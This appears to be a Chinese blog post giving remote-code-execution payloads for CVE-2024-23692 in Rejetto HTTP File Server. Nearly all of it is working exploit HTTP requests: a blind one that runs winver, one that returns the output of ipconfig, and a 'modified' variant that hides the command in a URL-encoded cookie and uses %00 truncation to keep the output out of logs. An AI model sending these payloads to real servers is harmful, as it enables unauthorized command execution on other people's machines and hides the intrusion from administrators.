[CVE-2024-23692] (HFS) Rejetto HTTP File Server RC...

    选择打赏方式

目前主流POC主要有两种

1. 无回显

GET /?search=%25V%25url%25:%host%}{.exec|winver.}{.break.} HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36
Host: 
Connection: close

2. 有回显
GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0
Connection: close

回显截图 使用%00截断回显日志:

00截断

简化魔改,使用自带参数和Cookie来隐藏执行

GET /?sort=%0a%00&search=%25V%25url%25:%host%}{.exec|{.?a.}{.cookie|HFS_SID_.}|out=res.}{.^res.} HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36
Host: 
Cookie: HFS_SID_=%77%68%6f%61%6d%69
Connection: close

截图


版权声明:若无特殊注明,本文皆为《 CM部落 》原创,转载请保留文章出处。
本文链接:[CVE-2024-23692] (HFS) Rejetto HTTP File Server RCE Payload魔改 https://www.itkz.cn/note/145.html
正文到此结束

热门推荐

发表吐槽

你肿么看?

你还可以输入 250 / 250 个字

嘻嘻 大笑 可怜 吃惊 害羞 调皮 鄙视 示爱 大哭 开心 偷笑 嘘 奸笑 委屈 抱抱 愤怒 思考 日了狗 胜利 不高兴 阴险 乖 酷 滑稽

评论信息框

吃奶的力气提交吐槽中...


既然没有吐槽,那就赶紧抢沙发吧!